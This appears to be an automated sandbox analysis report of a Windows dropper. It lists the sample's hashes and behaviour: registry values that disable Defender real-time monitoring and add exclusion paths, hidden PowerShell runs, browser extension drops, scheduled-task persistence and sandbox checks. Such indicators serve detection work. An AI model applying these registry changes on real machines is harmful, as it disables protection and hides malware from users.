Analysis
-
max time kernel
135s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02/06/2024, 01:02
Static task
static1
Behavioral task
behavioral1
Sample
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe
Resource
win7-20240221-en
General
-
Target
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe
-
Size
7.3MB
-
MD5
0c9f3e28ab69a267a1fff9fe9ae9f516
-
SHA1
1cf6dbc3e6e3ee82254a201dc9c87a12f08c1e31
-
SHA256
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a
-
SHA512
dc273d9860b8610b338cbfa0c922b7c4a9f6b68308957d2dea0d2124bd659ec0b04781321be3a3f66bc22d02992d8347c386bcceffe6fe49b58ae295e4154a27
-
SSDEEP
98304:91OC/3dy4gMqA3Varui/uMoMm1/df1kj+wIL7RyLGLlSjAzfC0SitAnoVB28nXNP:91OCPjobQ/R7we7E3uSvn7e9dkzrrza
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2580 powershell.exe 3036 powershell.exe 2984 powershell.exe 2596 powershell.exe 2536 powershell.exe 1816 powershell.exe 268 powershell.exe 980 powershell.EXE 2292 powershell.EXE 640 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\International\Geo\Nation eNYRCkf.exe -
Executes dropped EXE 4 IoCs
pid Process 2884 Install.exe 2544 Install.exe 2272 yMUNleu.exe 2028 eNYRCkf.exe -
Loads dropped DLL 15 IoCs
pid Process 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 2884 Install.exe 2884 Install.exe 2884 Install.exe 2884 Install.exe 2544 Install.exe 2544 Install.exe 2544 Install.exe 1604 WerFault.exe 1604 WerFault.exe 1604 WerFault.exe 1140 rundll32.exe 1140 rundll32.exe 1140 rundll32.exe 1140 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json eNYRCkf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json eNYRCkf.exe -
Drops file in System32 directory 26 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini yMUNleu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 eNYRCkf.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 eNYRCkf.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 eNYRCkf.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 eNYRCkf.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol yMUNleu.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA eNYRCkf.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eNYRCkf.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini yMUNleu.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol eNYRCkf.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol yMUNleu.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\ZEkGlaTFWGUn\MVNneNA.dll eNYRCkf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi eNYRCkf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja eNYRCkf.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\FMMsqqA.xml eNYRCkf.exe File created C:\Program Files (x86)\hsUwQAlMU\WchfhUg.xml eNYRCkf.exe File created C:\Program Files (x86)\dlfHiRefefjU2\fzhkqIFMOIlOb.dll eNYRCkf.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\AnjiESz.dll eNYRCkf.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\ViiciBn.xml eNYRCkf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak eNYRCkf.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\uIkTWbH.dll eNYRCkf.exe File created C:\Program Files (x86)\dlfHiRefefjU2\bifBtEe.xml eNYRCkf.exe File created C:\Program Files (x86)\hsUwQAlMU\zkIMIO.dll eNYRCkf.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi eNYRCkf.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job schtasks.exe File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job schtasks.exe File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job schtasks.exe File created C:\Windows\Tasks\BjyVbWVaXyfCTlHuI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1604 2272 WerFault.exe 64 2604 2544 WerFault.exe 29 2736 2028 WerFault.exe 227 -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1976 schtasks.exe 2916 schtasks.exe 2856 schtasks.exe 2456 schtasks.exe 1608 schtasks.exe 1872 schtasks.exe 2752 schtasks.exe 1092 schtasks.exe 420 schtasks.exe 1784 schtasks.exe 1788 schtasks.exe 1164 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D7D33897-E920-4B4C-BF10-C6A364CD478E} eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D7D33897-E920-4B4C-BF10-C6A364CD478E}\WpadDecisionReason = "1" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs eNYRCkf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0085000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-f1-3d-f4-cb-9d eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" yMUNleu.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings eNYRCkf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-f1-3d-f4-cb-9d\WpadDecisionTime = 60653cd588b4da01 eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-f1-3d-f4-cb-9d\WpadDecision = "0" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" yMUNleu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached yMUNleu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs eNYRCkf.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 1816 powershell.exe 268 powershell.exe 268 powershell.exe 268 powershell.exe 980 powershell.EXE 980 powershell.EXE 980 powershell.EXE 2292 powershell.EXE 2292 powershell.EXE 2292 powershell.EXE 2580 powershell.exe 640 powershell.EXE 640 powershell.EXE 640 powershell.EXE 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 2596 powershell.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2984 powershell.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2536 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeIncreaseQuotaPrivilege 2588 WMIC.exe Token: SeSecurityPrivilege 2588 WMIC.exe Token: SeTakeOwnershipPrivilege 2588 WMIC.exe Token: SeLoadDriverPrivilege 2588 WMIC.exe Token: SeSystemProfilePrivilege 2588 WMIC.exe Token: SeSystemtimePrivilege 2588 WMIC.exe Token: SeProfSingleProcessPrivilege 2588 WMIC.exe Token: SeIncBasePriorityPrivilege 2588 WMIC.exe Token: SeCreatePagefilePrivilege 2588 WMIC.exe Token: SeBackupPrivilege 2588 WMIC.exe Token: SeRestorePrivilege 2588 WMIC.exe Token: SeShutdownPrivilege 2588 WMIC.exe Token: SeDebugPrivilege 2588 WMIC.exe Token: SeSystemEnvironmentPrivilege 2588 WMIC.exe Token: SeRemoteShutdownPrivilege 2588 WMIC.exe Token: SeUndockPrivilege 2588 WMIC.exe Token: SeManageVolumePrivilege 2588 WMIC.exe Token: 33 2588 WMIC.exe Token: 34 2588 WMIC.exe Token: 35 2588 WMIC.exe Token: SeDebugPrivilege 268 powershell.exe Token: SeDebugPrivilege 980 powershell.EXE Token: SeDebugPrivilege 2292 powershell.EXE Token: SeDebugPrivilege 2580 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2792 WMIC.exe Token: SeIncreaseQuotaPrivilege 2792 WMIC.exe Token: SeSecurityPrivilege 2792 WMIC.exe Token: SeTakeOwnershipPrivilege 2792 WMIC.exe Token: SeLoadDriverPrivilege 2792 WMIC.exe Token: SeSystemtimePrivilege 2792 WMIC.exe Token: SeBackupPrivilege 2792 WMIC.exe Token: SeRestorePrivilege 2792 WMIC.exe Token: SeShutdownPrivilege 2792 WMIC.exe Token: SeSystemEnvironmentPrivilege 2792 WMIC.exe Token: SeUndockPrivilege 2792 WMIC.exe Token: SeManageVolumePrivilege 2792 WMIC.exe Token: SeDebugPrivilege 640 powershell.EXE Token: SeDebugPrivilege 3036 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2968 WMIC.exe Token: SeIncreaseQuotaPrivilege 2968 WMIC.exe Token: SeSecurityPrivilege 2968 WMIC.exe Token: SeTakeOwnershipPrivilege 2968 WMIC.exe Token: SeLoadDriverPrivilege 2968 WMIC.exe Token: SeSystemtimePrivilege 2968 WMIC.exe Token: SeBackupPrivilege 2968 WMIC.exe Token: SeRestorePrivilege 2968 WMIC.exe Token: SeShutdownPrivilege 2968 WMIC.exe Token: SeSystemEnvironmentPrivilege 2968 WMIC.exe Token: SeUndockPrivilege 2968 WMIC.exe Token: SeManageVolumePrivilege 2968 WMIC.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2104 WMIC.exe Token: SeIncreaseQuotaPrivilege 2104 WMIC.exe Token: 